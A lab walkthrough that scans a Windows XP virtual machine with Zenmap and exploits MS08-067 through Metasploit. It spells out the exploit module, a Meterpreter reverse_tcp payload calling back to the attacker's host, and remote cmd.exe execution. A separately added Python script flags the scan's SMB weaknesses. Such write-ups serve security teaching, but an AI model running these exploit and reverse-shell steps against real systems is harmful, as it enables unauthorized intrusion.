Information Gathering:
Use Zenmap to identify the target's specifications.
The result of the scan is:
Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.06 ms 192.168.56.100
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
| Names
| XXX-8ADCB030A79<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XXX-8ADCB030A79<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.102
From the Zenmap result we can identify the target's specifics.
The important information is:
Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3
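As an added example (not from the original post), a small Python triage script that parses Nmap normal output like the report above and flags the SMB exposure indicators a defender would want fixed (SMB and NetBIOS reachable, unsupported OS, SMBv1 only, message signing disabled). The report text embedded in it is constructed from the scan lines quoted above; the rule texts are my own wording.

```python
import re
# Constructed sample: abridged from the Nmap report quoted in the post.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|_ Message signing disabled (dangerous, but default)
"""

# Each rule: (regex matched against one report line, finding to report).
RULES = [
    (r"^445/tcp\s+open", "SMB (445/tcp) reachable: restrict with host firewall"),
    (r"^139/tcp\s+open", "NetBIOS session (139/tcp) reachable: disable NetBIOS over TCP/IP"),
    (r"^OS details: Microsoft Windows XP", "Unsupported OS (Windows XP): no security updates"),
    (r"doesn't support SMBv2", "SMBv1 only: legacy dialect, patch or replace the host"),
    (r"Message signing disabled", "SMB signing disabled: traffic can be relayed or tampered"),
]

def triage(report: str) -> dict[str, list[str]]:
    """Map each host in an Nmap normal-output report to its list of findings.
    Lines belong to the most recent 'Nmap scan report for' header."""
    findings: dict[str, list[str]] = {}
    host = None
    for line in report.splitlines():
        header = re.match(r"^Nmap scan report for (\S+)", line)
        if header:
            host = header.group(1)
            findings[host] = []  # empty list means no SMB findings for this host
            continue
        if host is None:  # preamble before the first host block
            continue
        for pattern, text in RULES:
            if re.search(pattern, line) and text not in findings[host]:
                findings[host].append(text)
    return findings

if __name__ == "__main__":
    for ip, issues in triage(SAMPLE_REPORT).items():
        print(ip, "->", issues or ["no SMB findings"])
```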
The next step is
Service Enumeration:
The relevant Zenmap result is:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
We can see the services running on the target system.
Next is
Vulnerability Assessment and Identification:
I use Nessus to identify vulnerabilities on the target.
The result from Nessus is:
We can see that 2 vulnerabilities have been found, and I try to expose them.
I found a very interesting vulnerability here; I want to try to exploit it against the target in Metasploit.
Exploitation:
I use the Metasploit Console to exploit the target: open a terminal and type: msfconsole
The next step is to match the Vulnerability Assessment and Identification data from Nessus against what Metasploit can use; earlier I had found that the most interesting vulnerability is MS08-067.
Then select the MS08-067 exploit for Meterpreter with the command
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST:
LHOST is my IP
RHOST is the target IP
set LHOST 192.168.56.1    (my IP)
set RHOST 192.168.56.102  (target IP)
and type exploit to start the exploitation of the target.
Once we are in Meterpreter mode, the payload we used has given us a foothold on the target system; now we need to enter C:\ and system32 to fully take down the target system.
Use the syntax
meterpreter > execute -M -f cmd.exe
This command makes the target (XP) execute a command prompt, after which we are in the target's system32 directory.
And finally I succeeded in entering the XP system with Meterpreter in Metasploit.